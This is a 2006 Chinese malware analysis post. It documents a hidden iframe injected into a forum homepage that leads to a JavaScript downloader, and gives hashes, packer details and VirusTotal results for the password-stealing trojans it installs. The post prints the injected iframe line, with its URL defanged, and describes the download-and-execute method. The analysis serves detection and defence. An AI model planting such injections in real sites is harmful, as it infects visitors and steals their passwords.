endurer 原创
2006-12-15 第1版
论坛首被加入代码:
/--------
<iframe src=hxxp://www.z*z***yqr.com.**/lpf/wm.htm width=0 height=0 frameborder=0></iframe>
--------/
wm.htm 的内容为JavaScript脚本程序,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 /mc/game/lpf.exe,保存为 c:/boot.exe,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。
lpf.exe 采用 Borland Delphi Setup Module 制作
/-------
文件说明符 : D:/virus/lpf.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2006-12-15 20:52:52
修改时间 : 2006-12-15 20:52:54
访问时间 : 2006-12-15 0:0:0
大小 : 15872 字节 15.512 KB
MD5 : 1914ec3e09f9bca86a10034ff9b3b985
-------/
Kaspersky报为 Trojan-Downloader.Win32.Delf.ajm,瑞星报为Trojan.DL.Multi.wen。
STATUS: FINISHED
Complete scanning result of "lpf.exe", received in VirusTotal at 12.15.2006, 14:28:30 (CET).
Antivirus | Version | Update | Result |
AntiVir | 7.3.0.15 | 12.15.2006 | TR/Delphi.Downloader.Gen |
Authentium | 4.93.8 | 12.14.2006 | Possibly a new variant of W32/SecRisk-ProcessPatcher-Sml-based!Maximus |
Avast | 4.7.892.0 | 12.15.2006 | no virus found |
AVG | 386 | 12.15.2006 | no virus found |
BitDefender | 7.2 | 12.15.2006 | BehavesLike:Win32.ExplorerHijack |
CAT-QuickHeal | 8.00 | 12.14.2006 | TrojanDownloader.Delf.ajm |
ClamAV | devel-20060426 | 12.15.2006 | Trojan.Downloader-51 |
DrWeb | 4.33 | 12.15.2006 | Trojan.DownLoader.14624 |
eSafe | 7.0.14.0 | 12.14.2006 | no virus found |
eTrust-InoculateIT | 23.73.86 | 12.15.2006 | no virus found |
eTrust-Vet | 30.3.3252 | 12.15.2006 | no virus found |
Ewido | 4.0 | 12.15.2006 | Downloader.Delf.ajm |
Fortinet | 2.82.0.0 | 12.15.2006 | no virus found |
F-Prot | 3.16f | 12.14.2006 | Possibly a new variant of W32/SecRisk-ProcessPatcher-Sml-based!Maximus |
F-Prot4 | 4.2.1.29 | 12.14.2006 | W32/SecRisk-ProcessPatcher-Sml-based!Maximus |
Ikarus | T3.1.0.26 | 12.15.2006 | no virus found |
Kaspersky | 4.0.2.24 | 12.15.2006 | Trojan-Downloader.Win32.Delf.ajm |
McAfee | 4919 | 12.14.2006 | Generic Delphi |
Microsoft | 1.1804 | 12.15.2006 | no virus found |
NOD32v2 | 1923 | 12.15.2006 | probably a variant of Win32/TrojanDownloader.Delf.NDQ |
Norman | 5.80.02 | 12.15.2006 | W32/Delf.TWZ |
Panda | 9.0.0.4 | 12.15.2006 | Suspicious file |
Prevx1 | V2 | 12.15.2006 | no virus found |
Sophos | 4.12.0 | 12.14.2006 | no virus found |
Sunbelt | 2.2.907.0 | 11.30.2006 | no virus found |
TheHacker | 6.0.3.132 | 12.14.2006 | no virus found |
UNA | 1.83 | 12.14.2006 | no virus found |
VBA32 | 3.11.1 | 12.14.2006 | no virus found |
VirusBuster | 4.3.19:9 | 12.14.2006 | no virus found |
Aditional Information
File size: 15872 bytes
MD5: 1914ec3e09f9bca86a10034ff9b3b985
SHA1: ad95735b4cb4ed24767801f3b3bde4823cd24281
lpf.exe会下载下列文件:
1)/mc/bao/lipengfei.exe
采用 UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo 加壳
/-------
文件说明符 : D:/virus/lipengfei.exe
属性 : A---
获取文件版本信息大小失败!创建时间 : 2006-12-15 21:2:56
修改时间 : 2006-12-15 21:2:58
访问时间 : 2006-12-15 0:0:0
大小 : 39069 字节 38.157 KB
MD5 : 8a91fe8298abe6d136e6e4a2071abb1e
-------/
瑞星报为:Trojan.PSW.QQPass.qxf
Complete scanning result of "lipengfei.exe", received in VirusTotal at 12.15.2006, 14:39:16 (CET).
Antivirus | Version | Update | Result |
AntiVir | 7.3.0.15 | 12.15.2006 | DR/Delphi.Gen |
Authentium | 4.93.8 | 12.14.2006 | no virus found |
Avast | 4.7.892.0 | 12.15.2006 | Win32:QQPass-EU |
AVG | 386 | 12.15.2006 | PSW.Generic2.SUE |
BitDefender | 7.2 | 12.15.2006 | Generic.PWStealer.A771A4B9 |
CAT-QuickHeal | 8.00 | 12.14.2006 | no virus found |
ClamAV | devel-20060426 | 12.15.2006 | no virus found |
DrWeb | 4.33 | 12.15.2006 | Trojan.PWS.Qqpass.326 |
eSafe | 7.0.14.0 | 12.14.2006 | suspicious Trojan/Worm |
eTrust-InoculateIT | 23.73.86 | 12.15.2006 | Win32/QQPass.Variant!Trojan |
eTrust-Vet | 30.3.3252 | 12.15.2006 | no virus found |
Ewido | 4.0 | 12.15.2006 | Trojan.QQPass.ra |
Fortinet | 2.82.0.0 | 12.15.2006 | no virus found |
F-Prot | 3.16f | 12.14.2006 | no virus found |
F-Prot4 | 4.2.1.29 | 12.14.2006 | no virus found |
Ikarus | T3.1.0.26 | 12.15.2006 | Trojan-PSW.Win32.Delf.IC |
Kaspersky | 4.0.2.24 | 12.15.2006 | Trojan-PSW.Win32.QQPass.ra |
McAfee | 4919 | 12.14.2006 | PWS-Hook.dll |
Microsoft | 1.1804 | 12.15.2006 | no virus found |
NOD32v2 | 1923 | 12.15.2006 | probably a variant of Win32/PSW.QQShou.EP |
Norman | 5.80.02 | 12.15.2006 | W32/QQPass.CHM |
Panda | 9.0.0.4 | 12.15.2006 | Suspicious file |
Prevx1 | V2 | 12.15.2006 | no virus found |
Sophos | 4.12.0 | 12.14.2006 | no virus found |
Sunbelt | 2.2.907.0 | 11.30.2006 | no virus found |
TheHacker | 6.0.3.132 | 12.14.2006 | Trojan/PSW.QQPass.ra |
UNA | 1.83 | 12.14.2006 | Trojan.PSW.Win32.QQPass.6EDE |
VBA32 | 3.11.1 | 12.14.2006 | BackDoor.Pigeon.516 |
VirusBuster | 4.3.19:9 | 12.14.2006 | no virus found |
Aditional Information
File size: 39069 bytes
MD5: 8a91fe8298abe6d136e6e4a2071abb1e
SHA1: 6909040f888c037999d64a32f5ef90521602ab93
packers: UPX
2)/mc/pqpq.exe
采用nSPack 1.3 -> North Star/Liu Xing Ping 加壳
/-------
文件说明符 : D:/pe/virus/pqpq.exe
属性 : A---
语言 : 中文(中国)
文件版本 : 0.00.0195
说明 :
版权 :
备注 :
产品版本 : 0.00.0195
产品名称 : Xcd
公司名称 : Xcd
合法商标 :
内部名称 : 23oigj
源文件名 : 23oigj.exe
创建时间 : 2006-12-15 21:3:12
修改时间 : 2006-12-15 21:3:14
访问时间 : 2006-12-15 0:0:0
大小 : 44151 字节 43.119 KB
MD5 : 04433d91f101e7c95d5d77c1cbe1efd6
-------/
瑞星报为:Trojan.PSW.Misc.kif
Complete scanning result of "pqpq.exe", received in VirusTotal at 12.15.2006, 14:47:23 (CET).
Antivirus | Version | Update | Result |
AntiVir | 7.3.0.15 | 12.15.2006 | TR/PSW.Lmir.44151 |
Authentium | 4.93.8 | 12.14.2006 | Possibly a new variant of W32/Suspicious:VisualBasicMalware!Maximus |
Avast | 4.7.892.0 | 12.15.2006 | no virus found |
AVG | 386 | 12.15.2006 | no virus found |
BitDefender | 7.2 | 12.15.2006 | Generic.PWSLmir.D80E5DAD |
CAT-QuickHeal | 8.00 | 12.14.2006 | (Suspicious) - DNAScan |
ClamAV | devel-20060426 | 12.15.2006 | no virus found |
DrWeb | 4.33 | 12.15.2006 | BackDoor.Generic.1482 |
eSafe | 7.0.14.0 | 12.14.2006 | suspicious Trojan/Worm |
eTrust-InoculateIT | 23.73.86 | 12.15.2006 | no virus found |
eTrust-Vet | 30.3.3252 | 12.15.2006 | no virus found |
Ewido | 4.0 | 12.15.2006 | no virus found |
Fortinet | 2.82.0.0 | 12.15.2006 | Spy/WOWSTEAL |
F-Prot | 3.16f | 12.14.2006 | Possibly a new variant of W32/Suspicious:VisualBasicMalware!Maximus |
F-Prot4 | 4.2.1.29 | 12.14.2006 | W32/Suspicious:VisualBasicMalware!Maximus |
Ikarus | T3.1.0.26 | 12.15.2006 | Backdoor.Win32.PcClient.GV |
Kaspersky | 4.0.2.24 | 12.15.2006 | no virus found |
McAfee | 4919 | 12.14.2006 | no virus found |
Microsoft | 1.1804 | 12.15.2006 | PWS:Win32/Wowsteal.gen!A |
NOD32v2 | 1923 | 12.15.2006 | a variant of Win32/PSW.Legendmir |
Norman | 5.80.02 | 12.15.2006 | no virus found |
Panda | 9.0.0.4 | 12.15.2006 | Suspicious file |
Prevx1 | V2 | 12.15.2006 | Trojan.SystemPoser |
Sophos | 4.12.0 | 12.14.2006 | Mal/PWS-D |
Sunbelt | 2.2.907.0 | 11.30.2006 | VIPRE.Suspicious |
TheHacker | 6.0.3.132 | 12.14.2006 | no virus found |
UNA | 1.83 | 12.14.2006 | no virus found |
VBA32 | 3.11.1 | 12.14.2006 | BackDoor.Generic.1482 |
VirusBuster | 4.3.19:9 | 12.14.2006 | novirus:Packed/NSPack |
Aditional Information
File size: 44151 bytes
MD5: 04433d91f101e7c95d5d77c1cbe1efd6
SHA1: 26478a8cb49411d3e87132cdad2c82993bf545f2
packers: NSPACK
packers: Packed
Prevx info: http://fileinfo.prevx.com/fileinfo.asp?PXC=cc5f62172717
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.
3)/mc/gezi.exe 未能获取
4)/mc/dabao.exe 未能获取
5)/mc/xbao.exe 未能获取
保存为C:/Program Files/Common Files下的
1.exe
2.exe
3.exe
4.exe
5.exe
与此前发现的十分相似,不过文件的MD5不同。
